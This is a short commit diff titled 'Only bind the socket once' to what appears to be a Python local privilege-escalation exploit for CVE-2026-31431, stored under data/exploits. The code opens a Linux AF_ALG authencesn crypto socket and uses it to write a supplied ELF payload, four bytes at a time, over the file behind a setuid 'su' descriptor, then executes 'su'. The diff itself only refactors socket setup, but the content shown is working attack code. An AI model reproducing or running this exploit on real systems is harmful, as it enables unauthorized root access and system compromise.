Only bind the socket once

data/exploits/CVE-2026-31431/CVE-2026-31431.py

@@ -14,12 +14,15 @@ ALG_SET_AEAD_ASSOCLEN = 4
 ALG_SET_AEAD_AUTHSIZE = 5
 SOL_ALG = 279
 
-def write(su_fd, offset, chunk):
+def setup_sock():
     sock = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
     sock.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
     sock.setsockopt(SOL_ALG, ALG_SET_KEY, bytes.fromhex("0800010000000010" + "0" * 64))
     sock.setsockopt(SOL_ALG, ALG_SET_AEAD_AUTHSIZE, None, 4)
     op_sock, _ = sock.accept()
+    return op_sock
+
+def write(op_sock, su_fd, offset, chunk):
     op_sock.sendmsg(
         [b"A" * 4 + chunk],
         [
@@ -45,7 +48,9 @@ except:
     print('[-] failed to load the ELF executable from the argument, it must be base64+gzip')
     sys.exit(os.EX_USAGE)
 
+op_sock = setup_sock()
 for i in range(0, len(elf), 4):
-    write(su_fd, i, elf[i:i + 4])
+    write(op_sock, su_fd, i, elf[i:i + 4])
+op_sock.close()
 
 os.execvp(su_path, ["su"] + sys.argv[1:])